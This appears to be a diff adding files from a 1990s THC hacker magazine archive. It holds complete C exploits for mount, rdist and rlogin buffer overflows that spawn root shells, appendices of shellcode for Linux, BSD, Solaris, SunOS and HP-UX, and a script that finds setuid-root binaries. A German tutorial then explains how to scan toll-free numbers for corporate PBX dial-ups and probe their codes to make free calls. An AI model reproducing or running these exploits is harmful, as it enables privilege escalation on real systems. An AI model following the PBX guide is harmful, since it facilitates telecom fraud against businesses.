+ #bluebox if my account is not k-lined ;)
+
+                                                       - plasmoid/thc/deep
+                                                       The Hacker's Choice
+                                             Drinking Evil Elite Phreakers
+
+ plasmoid deep/thc <plasmoid@usa.net>
+
+ -----BEGIN PGP PUBLIC KEY BLOCK-----
+ Version: 2.6.3i
+ mQCNAzJZDKwAAAEEANBXUFXqCzZLKuPj7OwB5O7thWOHlzzsi6SEZfsbiysPU4TL
+ AMsBuCV4257Rr0//aEMt4CWjAkO3YWcBzBMvGQIDhT06v9SB4LZep6wJlSIsFK3v
+ L1x+iYzSlvoXOHYSBcjoXA3sDm+kzz49to77Z20bJru7upjHD8iQeMWdAg+hAAUR
+ tBtwbGFzbW9pZCA8cGxhc21vaWRAdXNhLm5ldD6JAJUDBRAyWQysyJB4xZ0CD6EB
+ AQ6GBACB1n9DkgHfnC7D245MZPpacEHI8Jwj0DV6inV19E9qWf4VDdXA8+9YLuUV
+ hsV1/WRX3sJWGWmAQASPitl2tc+7vWw6VC4gjif1XsRttIuNwmvU+DPY7ZULueFe
+ bKoLI2zXsnWm/+8PMjc6GSYsNrXSpUjqkH6nIt6+sytm2QyWBw==
+ =Vbcq
+ -----END PGP PUBLIC KEY BLOCK-----
+
+
+ øexploitø[ø1ø]
+ ~~~~~~~~~~
+ /* -------------------------------------------------------------------------
+    mount.c - mount exploit for linux - version: < 2.0.10
+    discovered by bloodmask&vio/couin
+    coded by plasmoid/thc/deep for thc-magazine issue #3
+    12/12/96 - works also on umount
+    ------------------------------------------------------------------------- */
+
+ #include <stdio.h>
+
+ #define lv_size  1024
+ #define offset     30+lv_size+8*4
+ // -------------------------------------------------------------------------
+ long get_sp()
+ {
+   __asm__("movl %esp, %eax");
+ }
+ // -------------------------------------------------------------------------
+ main(int argc, char **argv)
+ {
+   char execshell[] =
+          "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
+          "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
+          "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
+
+  char buffer[lv_size+4*8];
+  unsigned long *ptr2 = NULL;
+  char           *ptr = NULL;
+  int           i;
+
+  for(i=0;i<lv_size+4*8;i++)
+   buffer[i]=0x00;
+  ptr=buffer;
+
+  for(i=0;i<lv_size-strlen(execshell);i++)
+   *(ptr++)=0x90;
+  for(i=0;i<strlen(execshell);i++)
+   *(ptr++)=execshell[i];
+  ptr2=(long *)ptr;
+  for(i=1;i<2;i++)
+   *(ptr2++)=get_sp()+offset;
+
+  printf("discovered by bloodmask&vio/couin\ncoded by plasmoid/thc/deep\nfor thc-magazine issue #3\n");
+  (void)alarm((int)0);
+  execl("/bin/mount", "mount", buffer, NULL);
+ }
+
+
+ øexploitø[ø2ø]
+ ~~~~~~~~~~
+ /* -------------------------------------------------------------------------
+    rdist.c - rdist exploit for freebsd & bsd/os - version: 2.0
+    discovered by brian mitchell
+    coded by plasmoid/thc/deep for thc-magazine issue #3
+    12/12/96
+    ------------------------------------------------------------------------- */
+
+ #include <stdio.h>
+
+ #define lv_size   256
+ #define offset     30+lv_size+8*4
+ // -------------------------------------------------------------------------
+ long get_sp()
+ {
+   __asm__("movl %esp, %eax");
+ }
+ // -------------------------------------------------------------------------
+ main(int argc, char **argv)
+ {
+  char execshell[]=
+         "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
+         "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
+         "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
+         "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
+
+  char buffer[lv_size+4*8];
+  unsigned long *ptr2 = NULL;
+  char           *ptr = NULL;
+  int           i;
+
+  for(i=0;i<lv_size+4*8;i++)
+   buffer[i]=0x00;
+  ptr=buffer;
+
+  for(i=0;i<lv_size-strlen(execshell);i++)
+   *(ptr++)=0x90;
+  for(i=0;i<strlen(execshell);i++)
+   *(ptr++)=execshell[i];
+  ptr2=(long *)ptr;
+  for(i=1;i<2;i++)
+   *(ptr2++)=get_sp()+offset;
+
+  printf("discovered by brian mitchell\ncoded by plasmoid/thc/deep\nfor thc-magazine issue #3\n");
+  execl("/usr/bin/rdist", "rdist", "-d", buffer, "-d", buffer, NULL);
+ }
+
+
+ øexploitø[ø3ø]
+ ~~~~~~~~~~
+/*
+ * rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines
+ * by exploiting the gethostbyname() overflow in rlogin.
+ *
+ * gcc -o rlogin-exploit rlogin-exploit.c
+ *
+ * Jeremy Elson, 18 Nov 1996
+ * jeremy.elson@nih.gov
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define BUF_LENGTH      8200
+#define EXTRA           100
+#define STACK_OFFSET    4000
+#define SPARC_NOP       0xa61cc013
+
+u_char sparc_shellcode[] =
+"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
+"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
+"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
+"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
+"\x82\x10\x20\x3b\x91\xd4\xff\xff";
+
+u_long get_sp(void)
+{
+  __asm__("mov %sp,%i0 \n");
+}
+
+void main(int argc, char *argv[])
+{
+  char buf[BUF_LENGTH + EXTRA];
+  long targ_addr;
+  u_long *long_p;
+  u_char *char_p;
+  int i, code_length = strlen(sparc_shellcode);
+
+  long_p = (u_long *) buf;
+
+  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
+    *long_p++ = SPARC_NOP;
+
+  char_p = (u_char *) long_p;
+
+  for (i = 0; i < code_length; i++)
+    *char_p++ = sparc_shellcode[i];
+
+  long_p = (u_long *) char_p;
+
+  targ_addr = get_sp() - STACK_OFFSET;
+  for (i = 0; i < EXTRA / sizeof(u_long); i++)
+    *long_p++ = targ_addr;
+
+  printf("Jumping to address 0x%lx\n", targ_addr);
+
+  execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
+  perror("execl failed");
+}
+
+
+ øappendixø[øAø]
+ ~~~~~~~~~~~
+-------------------------------------------------------------------------------
+ linux/i80386+
+-------------------------------------------------------------------------------
+ assembler code:
+ ~~~~~~~~~~~~~~
+                jmp    end_of_code
+ execve:        popl   %esi
+                movl   %esi,0x8(%esi)
+                xorl   %eax,%eax
+                movb   %eax,0x7(%esi)
+                movl   %eax,0xc(%esi)
+                movb   $0xb,%al
+                movl   %esi,%ebx
+                leal   0x8(%esi),%ecx
+                leal   0xc(%esi),%edx
+                int    $0x80
+                xorl   %ebx,%ebx
+                movl   %ebx,%eax
+                inc    %eax
+                int    $0x80
+ end_of_code:   call   exec_prog
+                .string "/bin/sh\"
+
+ string for c code:
+ ~~~~~~~~~~~~~~~~~~
+ char execshell[] =
+        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
+        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
+        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
+
+-------------------------------------------------------------------------------
+ bsd/os/i80386+ and freebsd/i80386+
+-------------------------------------------------------------------------------
+ assembler code:
+ ~~~~~~~~~~~~~~~
+                jmp     end_of_code
+ execve:        popl    %esi
+                leal    (%esi), %ebx
+                movl    %ebx, 0x0b(%esi)
+                xorl    %edx, %edx
+                movl    %edx, 7(%esi)
+                movl    %edx, 0x0f(%esi)
+                movl    %edx, 0x14(%esi)
+                movb    %edx, 0x19(%esi)
+                xorl    %eax, %eax
+                movb    $59, %al
+                leal    0x0b(%esi), %ecx
+                movl    %ecx, %edx
+                pushl   %edx
+                pushl   %ecx
+                pushl   %ebx
+                pushl   %eax
+                jmp     bewm
+ end_of_code:   call    execve
+                .string   '/bin/sh'
+                .byte   1, 1, 1, 1
+                .byte   2, 2, 2, 2
+                .byte   3, 3, 3, 3
+ bewm:          .byte   0x9a, 4, 4, 4, 4, 7, 4
+
+ string for c code:
+ ~~~~~~~~~~~~~~~~~~
+ char execshell[]=
+        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
+        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
+        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
+        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
+
+
+
+------------------------------------------------------------------------------
+ solaris/sparc processor
+------------------------------------------------------------------------------
+ assembler code:
+ ~~~~~~~~~~~~~~~
+                sethi   0xbd89a, %l6
+                or      %l6, 0x16e, %l6
+                sethi   0xbdcda, %l7
+                and     %sp, %sp, %o0
+                add     %sp, 8, %o1
+                xor     %o2, %o2, %o2
+                add     %sp, 16, %sp
+                std     %l6, [%sp - 16]
+                st      %sp, [%sp - 8]
+                st      %g0, [%sp - 4]
+                mov     0x3b, %g1
+                ta      8
+                xor     %o7, %o7, %o0
+                mov     1, %g1
+                ta      8
+
+ string for c code:
+ ~~~~~~~~~~~~~~~~~~
+ char execshell[59]=
+        0x2d,0x0b,0xd8,0x9a,0xac,0x15,0xa1,0x6e,0x2f,0x0b,0xdc,0xda,0x90,
+        0x0b,0x80,0x0e,0x92,0x03,0xa0,0x08,0x94,0x1a,0x80,0x0a,0x9c,0x03,
+        0xa0,0x10,0xec,0x3b,0xbf,0xf0,0xdc,0x23,0xbf,0xf8,0xc0,0x23,0xbf,
+        0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x08,0x90,0x1b,0xc0,0x0f,
+        0x82,0x10,0x20,0x01,0x91,0xd0,0x20,0x08";
+
+  optional version:
+  char execshell[54]=
+            0x9fc0202c,0xc0247ff5,0xe227bff0,0xc027bff4,0x9207bff0,0x901d200a,
+            0x901a200a,0x8210203b,0x91d02008,0x82102001,0x91d02008,0xa3c3e004,
+            "/bin/sh";
+
+
+------------------------------------------------------------------------------
+ sunos/sparc processor
+------------------------------------------------------------------------------
+ assembler code:
+ ~~~~~~~~~~~~~~~
+                sethi   0xbd89a, %l6
+                or      %l6, 0x16e, %l6
+                sethi   0xbdcda, %l7
+                and     %sp, %sp, %o0
+                add     %sp, 8, %o1
+                xor     %o2, %o2, %o2
+                add     %sp, 16, %sp
+                std     %l6, [%sp - 16]
+                st      %sp, [%sp - 8]
+                st      %g0, [%sp - 4]
+                mov     0x3b, %g1
+                mov     -0x1, %l5
+                ta      %l5 + 1
+                xor     %o7, %o7, %o0
+                mov     1, %g1
+                ta      %l5 + 1
+
+ string for c code:
+ ~~~~~~~~~~~~~~~~~~
+ char execshell[63]=
+        0x2d,0x0b,0xd8,0x9a,0xac,0x15,0xa1,0x6e,0x2f,0x0b,0xdc,0xda,0x90,
+        0x0b,0x80,0x0e,0x92,0x03,0xa0,0x08,0x94,0x1a,0x80,0x0a,0x9c,0x03,
+        0xa0,0x10,0xec,0x3b,0xbf,0xf0,0xdc,0x23,0xbf,0xf8,0xc0,0x23,0xbf,
+        0xfc,0x82,0x10,0x20,0x3b,0xaa,0x10,0x3f,0xff,0x91,0xd5,0x60,0x01,
+        0x90,0x1b,0xc0,0x0f,0x82,0x10,0x20,0x01,0x91,0xd5,0x60,0x01";
+
+------------------------------------------------------------------------------
+ hp-ux9/hp9000
+------------------------------------------------------------------------------
+ string for c code:
+ ~~~~~~~~~~~~~~~~~~
+ char execshell[]=
+        "\x34\x59\x01\x02\x34\x5a\x01\x32\x37\x5a\x3e\xf9\x6b\x3a\x3f\x01"
        "\x63\x40\x3f\xff\x34\x5a\x01\x38\x63\x40\x3f\x35\x37\x5a\x3e\xf9"
+        "\x6b\x3a\x3f\x09\x63\x40\x3f\xff\x0b\x5a\x02\x9a\x6b\x3a\x3f\x11"
+        "\x34\x5a\x01\x22\x37\x5a\x3e\xf9\x6f\x3a\x3e\xf9\x20\x20\x08\x01"
+        "\x34\x16\x01\x1e\xe4\x20\xe0\x08\x36\xd6\x3e\xf9\x0b\x5a\x02\x9a"
+        "\x20\x20\x08\x01\x34\x16\x01\x0a\xe4\x20\xe0\x08\x36\xd6\x3e\xf9"
+        "\xe8\x5f\x1f\x35\x0b\x5a\x02\x9a\x01\x01\x01\x01\x01\x01\x01\x01"
        "\x01\x01\x01\x01\x01\x01\x01\x01\x00/bin/sh";
+ øappendixø[øBø]
+ ~~~~~~~~~~~
+-------------------------------------------------------------------------------
+ no operation - nop - for the different systems
+-------------------------------------------------------------------------------
+ linux/i80386+                            -  char nop[1]=0x90;
+ bsd/os/i80386+ and freebsd/i80386+       -  char nop[1]=0x90;
+ solaris/sparc processor                  -  char nop[4]=0xac15a16e;
+ sunos/sparc processor                    -  char nop[4]=0xac15a16e;
+ hp-ux9/hp9000                            -  char nop[4]=0xac15a16e;
+
+ øappendixø[øCø]
+ ~~~~~~~~~~~
+-------------------------------------------------------------------------------
+ linux/i80386+ and bsd/os/i80386+ and freebsd/i80386+
+-------------------------------------------------------------------------------
+ getting the stackpointer:
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ long get_sp()
+ {
+  __asm__("movl %esp,%eax");
+ }
+
+-------------------------------------------------------------------------------
+ solaris/sparc processor and sunos/sparc processor
+-------------------------------------------------------------------------------
+ getting the stackpointer:
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ long get_sp()
+ {
+  asm("or %sp, %sp, %i0");
+ }
+
+ øappendixø[øDø]
+ ~~~~~~~~~~
+--------------------------------------------------------------------[cut here]-
+ #!/bin/sh
+ # findsuid.sh by plasmoid/thc/deep
+ # important directories for linux system, try different ones
+ # for other systems (/usr/etc, /usr/local/bin, /usr/local/etc, /usr/sbin)
+ find /bin -user root -perm +a=s > suid.lst
+ find /sbin -user root -perm +a=s >> suid.lst
+ find /usr/bin -user root -perm +a=s >> suid.lst
+ find /etc -user root -perm +a=s >> suid.lst
+ find /var -user root -perm +a=s >> suid.lst
+--------------------------------------------------------------------[cut here]-
+
+ <END OF FiLE - THC iN 1996>
+

Papers/pbx.txt

@@ -0,0 +1,708 @@
+÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷
+÷                                                                             ÷
+÷                        PBX HACKING IN DEUTSCHLAND                           ÷
+÷                  von gorfus / cpi\thc f�r thc-mag vol. #4                   ÷
+÷                                                                             ÷
+÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷
+
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+sorry, this text is only in german! there exist really a lot english texts
+about this theme so check one of these! if you need informations provided in
+this text, so try to find someone who is able to translate.. may not be that
+easy regarding to my german textstyle... well... good luck!
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+Dieser Text dient nur zur Aufkl„rung und Information. Er soll Sicherheitsl�cken
+offenlegen und Firmen vor derlei Betrug besch�tzen. Beschriebene Handlungen
+sind illegal und sollten auf keinen Fall nachgeahmt werden. Der Autor �bernimmt
+deshalb keine Haftung f�r Sch„den die durch diese Informationen entstehen. Wer
+sich trotzdem nicht zusammenreiáen kann, muá auch die Konzequensen akzeptieren
+k”nnen. Wenn ihr also Probleme bekommt ist das ganz allein eure Schuld!!
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+Hallo!
+   Willkommen zu PBX-Hacking in Deutschland. Dieser Text vermittelt
+   Grundlagen und Praktiken zum Scannen und Benutzen von PBX-Systemen.
+   Viele Dinge sind dem einen oder anderen vielleicht schon bekannt, es
+   soll aber immernoch Leute geben, die nicht einmal die Grundlagen kennen.
+   Der Text richtet sich an solche nicht so mit PBX'en erfahrene Leute. Aber
+   auch schon erfahrene Leute k”nnen unter Umst„nden etwas neues erfahren.
+   Alles in allem ist dieser Text f�r alle die sich irgentwie f�r dieses Thema
+   interessieren.
+
+Inhalt: - Warum?
+        - Begriffe und was sie bedeuten.
+        - Wie funktioniert das ganze?
+        - Verschiedene Systeme/Service Promts.
+        - Tools&Texte, die viel Arbeit erleichtern.
+        - Nachspann
+
+
+--------
+ Warum?
+--------
+
+   Die wichtigste Frage ist wie immer dieselbe: Warum sich soviel Arbeit
+   machen? Warum das Risiko eingehen? Nun, zum einen kann man seinen
+   Wissensdurst befriedigen und ohne Risiko w„r das Leben schlieálich nur halb
+   so sch”n. Zum anderen begl�ckt uns die Telekom monatlich mit ihrer viel zu
+   teuren Rechnung. Diese gilt es zu dr�cken, da man durch gezieltes Sparen
+   sehr, sehr reich werden kann. Und wer will schlieálich nicht reich werden??
+   Nun, um auf den Punkt zu kommen: Man kann durch PBX-Systeme in den Genuá
+   kommen, kostenlos Serviceleistungen in Anspruch zu nehmen, da die Systeme
+   als 0130-nummer gratis erreicht werden k”nnen. Zu diesen Dienstleistungen
+   geh”rt nat�rlich auch die M”glichkeit des kostenlosen Telefonierens.
+
+
+--------------------------------
+ Begriffe und was sie bedeuten.
+--------------------------------
+
+   - PBX -
+        = "Private Branch eXchange"
+        Das ist der haupts„chliche Name f�r eine ganze Reihe von verschiedenen
+        Systemen. Diese Gleichsetzung ist haupts„chlich die Folge daraus, das
+        man alle auf mehr oder weniger „hnlichen Wegen zum kostenlosen Telefon-
+        iren (ab)nutzen kann. Diese sind im eigentlichen Sinne Firmenupdials.
+        Man kann dann die jeweilige Nummer w„hlen, um den W„hlton der Firma
+        (bzw. des firmeneigenen Telefonsystems (die PBX)) zu erreichen. Von da
+        aus kann man dann interne Nummern w„hlen oder eine herausf�hrende
+        Leitung erhalten. Um dies zu erreichen muá man eine bestimmte Ziffer
+        vorher w„hlen. Am h„ufigsten ist dies '9', aber '0', '1', '#' und '*'
+        werden auch manchmal benutzt.
+
+   - PABX -
+        = "Private Automated Branch eXchange"
+        Dies ist genau dasselbe wie eine PBX nur mit dem Zusatz 'automatisch'.
+        Damit ist aber gemeint, daá es bei pbx'en keine (bzw. selten) Operator
+        gibt. Es �bernimmt also ein Computer die Verwaltung. Mit anderen Worten
+        ist also PBX eine wesentlich gebr„uchlichere Abk�rzung von PABX.
+        Deshalb wird von den Herstellerfirmen mittlerweile die Bezeichnug
+        P(A)BX verwendet.
+
+   - CBX -
+        = "Computerized Branch eXchange"
+        Dies ist, wie der Name schon sagt, ein PBX-System welches durch einen
+        Computer kontrolliert wird. Man kann darin ganze Netzwerke von LAN's
+        viele interne Telefone, Voicemail und viele weitere interessante Dinge
+        einbinden. Diese haben auch Funktionen um bei Problemen, Hackversuchen
+        und anderen Unregelm„áigkeinten sofort eine Benachrichtigung zu
+        verschicken. Auáerdem k”nnen Telefonate bzw. alle Leitungen bei einigen
+        in Echtzeit verfolgt (monitored) werden. Viele PBX Systeme basieren auf
+        diesem Prinzip und deshalb wird PBX Hacking auch immer gef„hrlicher.
+        Eine andere interessante Funktion sind Remote Carriers zum System
+        einstellen, falls dies einmal n”tig sein sollte. Einmal in ein solches
+        System eingedrungen kann man dort wirklich alles „ndern z.B. accounts,
+        logfiles etc. Sehr bekannte (und verbreitete) Systeme sind zum Beispiel
+        die Definity Serien von LUCENT/AT&T (mit System 75 & 85) und die ROLM
+        CBX von Siemens Rolm Communications Inc. Weitere Informationen zu
+        diesen Systemen findet Ihr im entsprechenden Kapitel weiter am Ende
+        dieses Textes.
+
+   - EXT -
+        = "EXTender"
+        Ein Extender wird meist mit einer PBX gleichgesetzt, da sie sehr
+        „hnlich in Funktion, Arbeitsweise und Aufbau sind. Diese sind entweder
+        wie PBX'en direkte Firmendialups, sondern werden manchmal auch von
+        grӇeren Firmen(z.B. Telekommunikationsfirmen) zum Netzausbau,
+        Mitarbeiterunterst�tzung und zum f�hren billigerer Ferngespr„che
+        benutzt. Der gravierensde Unterschied ist, das Extender in den USA
+        immer auf echten kostenlosen Nummern liegen, was aber nicht weiter
+        interessant ist, da f�r die meisten Einwohner der USA Ortsgespr„che
+        sowieso kostenlos sind, und PBX'en deutscher Firmen (JA, auf
+        KOSTENPFLICHTIGEN Nummern) f�r uns zu teuer (und direkt angerufen auch
+        zu gef„hrlich) sind. Einen Umweg bieten Outdials (oder sonstwas wie z.B.
+        Callingcards) im Ausland, da der Vorteil bei deutschen Outdials darin
+        liegt, 0190 Nummern anrufen zu k”nnen. (Was man damit anf„ngt sollte
+        jeder f�r sich entscheiden k”nnen...)
+
+   Fazit: PBX, PABX & CBX sind dasselbe, der Unterschied zu Extender ist
+   erstens nicht sehr groá und zweitens f�r uns in Deutschland uninteressant.
+
+
+-----------------------------
+ Wie funktioniert das Ganze?
+-----------------------------
+
+   Nun, diese Systeme wurden alle installiert damit die Angestellten nicht f�r
+   Gesch„ftstelefonate bezahlen m�ssen, da dies nicht fair w„re und Herr XYZ
+   ja nicht auch noch gesch„digt werden sollte, wenn er zu Hause arbeiten muá
+   w„hrend sein Boss mit der Sekret„rin rummacht. Wenn jener Arbeitnehmer dann
+   von zu Hause z.B. ein Transportunternehmen beautragen muá, benutzt er f�r
+   den Anruf die PBX seiner Firma. Er w„hlt dazu die Nummer des Dialups
+   (0130-894614) gibt seinen pers”hnlichen Code ein (62542626789) und ruft
+   dann UPS (oder was auch immer) an.
+
+   Was man als nur machen muá ist die Nummer des Dialups zu finden und einen
+   Code zu scannen. Dies gestaltet sich aber, wie alles im Leben, nicht ganz
+   so einfach wie es sich anh”rt...
+
+   1. Problem: Wie bekomme ich die Dialup-Nummer?
+        Dies ist der einfachste Teil.. Man scannt einfach einen bestimmten
+        0130-Bereich (z.b. 0130-822-XXX) mit einem Telefon oder einem Scanner
+        (THC-Scan oder Toneloc). Falls einigen nicht ganz klar ist, wie sie
+        dies anstellen sollen muá man sagen, daá man dabei vorm Computer
+        sitzt und sich alles anh”rt.. Dabei h”rt man (hoffentlich) Nummern die
+        einen neuen W„hlton von sich geben. Dies sind meist die besten PBX
+        Nummern. Aber auch automatische Prompts die eine Ansage wie z. B.
+        "Please enter your Personnel Id Number (PIN)" k”nnen Outdials besitzen.
+        Meistens sind dies aber nur Service-Provider. Man kann allerdings auch
+        so wichtige Dinge wie B”rsenkurse, Wetteransage oder ganz toll: neue
+        VMB's oder Kartenpromts dabei entdecken.
+        Nach jenen mit einem neuen DialTone kann man auch automatisch scannen.
+        Dazu stellt man seinen Scanner so ein, daá ein dialstring wie dieser
+        herauskommt:    ATDT0130-XXXXXXW;
+        Damit w„hlt das Modem dann die Nummer und wartet auf den W„hlton. Wenn
+        dieser NICHT gefunden wird reagiert es allergisch und h„ngt mit einem
+        w�tenden 'NO DIALTONE' auf. Falls es aber einen W„hlton findet geht er
+        im String weiter und kehrt durch das Semikolon wieder in den Kommando-
+        modus zur�ck. Dies wird durch ein 'OK' vom Modem kommentiert und man
+        hat seinen Success-String.
+        Einstellen kann man dies bei THC-Scan und Toneloc in der Option
+        'Scan For' indem man es auf Tones bzw. PBX setzt. Genaueste Angaben
+        k”nnt ihr aus den jeweiligen Programmdokumentationen entnehmen. Es gibt
+        zudem auch (wenige) PBX-Systeme die sich nur mit Stille melden.. Diese
+        kann man nach dem selben Prinzip, nur mit ATDT0130-XXXXXX@;, scannen.
+
+   2. Problem: Wunderbar, ich hab ne Nummer... Was nun?
+        Zuerst sollte man herausfinden in welchem Land sich die PBX befindet.
+        Meist reicht die Kenntnis der ungef„hren Region aus. 'Wozu muá ich das
+        wissen?' werden sich sicherlich einige Fragen... Nun, zum einen sollte
+        man sicher sicher gehen, daá sich das Zielsystem nicht in Deutschland
+        befindet, denn diese haben in 99% aller F„lle eine Fangschaltung
+        zum Schutz installiert. Wenn die dann merken was vor sich geht, rufen
+        sie die Bullen und dann kommen bei euch die netten Jungs von LKA zum
+        Kaffeetrinken vorbei. Von den Sicherheitsproblemen mal abgesehen ist
+        die Kenntnis des Landes/Region zum weiteren Analysieren von Bedeutung.
+        Um n„mlich herauszufinden wie der Aufbau der PBX ist, ben”tigt man die
+        L„nge der m”glichen anrufbaren Nummern und deren Prefix.
+        Erkennen kann man das Land am Klingelzeichen, am Vorhanden/Nicht-
+        vorhandensein von C5-Beepz, am Knacken der Schmitt-Trigger beim
+        Verbindungsaufbau. Vergleicht einfach den Dialup mit Nummern von denen
+        ihr wisst wo sie sind. z.B. mit Nummern von PhoneCompanies:
+                0130-0222 (Telekom)
+                0130-0010 (AT&T   - USA)
+                0130-0012 (MCI    - USA)
+                0130-0013 (SPRINT - USA)
+                0130-800XXX (HCD des Landes des CountrieCodes statt XXX)
+
+        Nehmen wir nun an ihr habt ein System in den USA und wollt den Aufbau
+        wissen. Ihr probiert einfach verschiedene Eingabem”glichkeiten aus.
+        Als erstes versucht man nach wievielen T”nen die PBX reagiert. Dazu
+        w„hlt man einfach irgentetwas (mit verschiedenen Nummern am Anfang)
+        und h”rt ob es eine Reaktion gibt. Meistens gibt es bei falschen
+        Eingaben eine Art Alarmton, der etwas an Polizei/Krankenwagen Sirenen
+        errinnert. Wenn also solch ein Signal immer nach 3 eingegebenen Ziffern
+        ert”nt, will die PBX zuerst einen 3 stelligen Code. Anderenfalls, wenn
+        nach 10 Ziffern (oder '1' + 10 Ziffern) ein neuer Ton ert”nt und immer
+        nach 3 weiteren Ziffern der beschriebene Alarmton erklingt, will die
+        PBX zuerst die Nummer, dann den Code. Die meisten allerding wollen
+        zuerst den Code, und erst nach Eingabe des Codes einen neuen W„hlton
+        von sich geben..  Oder, Code+Nummer (oder andersrum) und erst
+        nach beidem den Alarmton oder eine Ansage von sich geben..
+        Deshalb hier ein paar Beispiele:
+
+        1. Beispiel:
+          0130-XXXXXX
+          W„hlton [TUUUT]
+          XXXX (falscher Code)
+          Alarmton
+         Diese will also (angenommen) CODE + Nummer...
+         Ein Scanerfolg s„he dann also so aus:
+          0130-XXXXXX
+          W„hlton [TUUUT]
+          YYYY (richtiger Code)
+          W„hlton [TUUUT]
+         An diesem Punkt kann man jetzt entweder direkt w„hlen (mit oder ohne
+         die '1' (falls die PBX in den USA ist)) oder erst eine '9' bzw. eine
+         andere Taste (wie schon gesagt, wenn '9' nicht geht, mal mit '0','1',
+         '#' oder '*' probieren) dr�cken. Dann kommt entweder ein neuer W„hlton
+         (Was noch einer? ;) oder man kann direkt weiter w„hlen.. Dies alles
+         fordert halt ein wenig Ausprobieren.. (Puhh, was f�rne Arbeit! ;)
+
+        2. Beispiel:
+          0130-XXXXXX
+          W„hlton [TUUUT]
+          1XXXXXXXXXX
+          W„hlton [TUUUT]
+          XXXX
+          Alarmton
+         Wie Ihr euch bestimmt schon denken k”nnt, verlangt diese PBX
+         Nummer + CODE..
+         Bei diesen sollte man m”glichst immer eine andere Zielnummer eingeben,
+         da sonst euer Scannen sehr sehr schnell bemerkt werden kann...
+         Falls nach 10 bzw. 11 Stellen der Alarmton kommt, ihr aber denkt das
+         es trotzdem ZUERST die Nummer will, solltet ihr versuchen bestimmte
+         Vorwahlen (Areacodes) zu testen. Am besten eigenen sich dazu (1)-800
+         und (1)-888, weil dies die Vorwahlen kostenfreier Nummern sind. Ebenso
+         kann die Nummer nur 7 stellig sein, falls die PBX nur lokale Nummern
+         unterst�tzt (diese Nummern kosten die Firma n„mlich nichts (mal
+         abgesehen von den Geb�hren an die Telekom) und das reicht ja auch aus,
+         daá Herr Mitchel mal eben seine Frau anrufen kann (so zur Kontrolle ;).
+
+        3. Beispiel:
+          0130-XXXXXX
+          W„hlton [TUUUT]
+          XXXXXXXXXXXXXXX
+          Ansage: 'Sorry! Invalid destination Number or bad passcode!'
+         Diese hier will anscheinend Nummer und CODE in einer bestimmten
+         Reihenfolge ohne Unterbrechung haben. Was nun? Versucht halt dies:
+          0130-XXXXXX
+          W„hlton [TUUUT]
+          18123391811XXXX
+          Ansage: 'Sorry! You're not allowed to dial this number!'
+         Aha, also f�r Gespr„che innerhalb der USA zuerst die Nummer (mit der
+         '1' am Anfang), danach den CODE. Bei solchen kann man auch mal
+         versuchen international zu w„hlen:
+          0130-XXXXXX
+          W„hlton [TUUUT]
+          01149894620013311XXXX
+         Falls dann wieder eine solche Ansage kommt, kann sie auch internat.
+         w„hlen (cool, nicht wahr?), falls nicht, kommt entweder irgentwelche
+         Fehlermeldungen oder Ihr k”nnt erst garnicht mehr als 15 Stellen
+         w„hlen.
+
